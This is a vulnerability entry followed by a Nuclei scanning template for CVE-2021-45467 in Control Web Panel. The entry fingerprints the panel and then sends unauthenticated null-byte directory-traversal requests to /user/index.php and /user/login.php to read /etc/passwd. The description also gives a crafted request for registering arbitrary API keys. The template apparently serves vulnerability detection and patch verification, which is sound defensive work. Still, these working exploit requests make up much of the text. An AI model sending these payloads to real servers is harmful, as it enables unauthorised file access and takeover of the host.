In CWP (Control Web Panel, previously CentOS Web Panel) before version 0.9.8.1107, an unauthenticated attacker can abuse null byte (%00) injection with the "scripts" parameter in the /user/loader.php or /user/login.php endpoints to register arbitrary API keys or access sensitive files. This can be exploited by using multiple %00 sequences to traverse directories via crafted requests such as /user/loader.php?api=1&scripts=.%00./.%00./api/account_new_create&acc=guadaapi, or similar payloads with more %00 instances (e.g., .%00%00%00./.%00%00%00./api/account_new_create). Attackers may use this flaw for arbitrary file access, privilege escalation, or remote code execution.
PoC代码[已公开]
id: CVE-2021-45467
info:
name: Control Web Panel (CWP) - File Inclusion
author: ritikchaddha
severity: critical
description: |
In CWP (Control Web Panel, previously CentOS Web Panel) before version 0.9.8.1107, an unauthenticated attacker can abuse null byte (%00) injection with the "scripts" parameter in the /user/loader.php or /user/login.php endpoints to register arbitrary API keys or access sensitive files. This can be exploited by using multiple %00 sequences to traverse directories via crafted requests such as /user/loader.php?api=1&scripts=.%00./.%00./api/account_new_create&acc=guadaapi, or similar payloads with more %00 instances (e.g., .%00%00%00./.%00%00%00./api/account_new_create). Attackers may use this flaw for arbitrary file access, privilege escalation, or remote code execution.
impact: |
A remote, unauthenticated attacker can leverage this vulnerability to register arbitrary API keys, access sensitive files (such as /etc/passwd), and potentially achieve remote code execution. Successful exploitation results in full compromise of the web panel and host system, allowing for exposure of confidential data, server takeover, and further attacks on internal infrastructure.
remediation: |
Update to version 0.9.8.1107 or later to fix input validation issues.
reference:
- https://octagon.net/blog/2022/01/22/cve-2021-45467-cwp-centos-web-panel-preauth-rce/
- https://nvd.nist.gov/vuln/detail/CVE-2021-45467
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2021-45467
epss-score: 0.89554
epss-percentile: 0.99524
cwe-id: CWE-862
cpe: cpe:2.3:a:control-webpanel:webpanel:*:*:*:*:*:*:*:*
metadata:
verified: false
max-request: 5
vendor: control_webpanel
product: webpanel
fofa-query: icon_hash="-356182173"
tags: cve,cve2021,cwp,rce,lfi,centos,webpanel,vkev
flow: http(1) && http(2)
http:
- method: GET
path:
- "{{BaseURL}}/login/cwp_theme/original/img/ico/favicon.ico"
- "{{BaseURL}}/login/design/img/ico/favicon.ico"
- "{{BaseURL}}"
redirects: true
stop-at-first-match: true
matchers:
- type: dsl
dsl:
- "status_code==200 && ('-356182173' == mmh3(base64_py(body)))"
- "status_code==200 && contains_any(tolower(body), 'control webpanel', 'cwp | user')"
condition: or
- method: GET
path:
- "{{BaseURL}}/user/index.php?api=1&scripts=.%00%00%00./.%00%00%00./.%00%00%00./.%00%00%00./.%00%00%00./.%00%00%00./.%00%00%00./.%00%00%00./.%00%00%00./.%00%00%00./.%00%00%00./.%00%00%00./etc/passwd"
- "{{BaseURL}}/user/login.php?api=1&scripts=.%00%00%00./.%00%00%00./.%00%00%00./.%00%00%00./.%00%00%00./.%00%00%00./.%00%00%00./.%00%00%00./.%00%00%00./.%00%00%00./.%00%00%00./.%00%00%00./etc/passwd"
stop-at-first-match: true
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0:"
- type: status
status:
- 200
# digest: 4a0a0047304502210081e99cbd13421ebb142be3afa0573211a7a550e000148adafdc70bfc471a26aa022025a08bf04c45ec2f3f71b80759b572bc4c9bc1578632bbca21928985f4a2d4ed:922c64590222798bb761d5b6d8e72950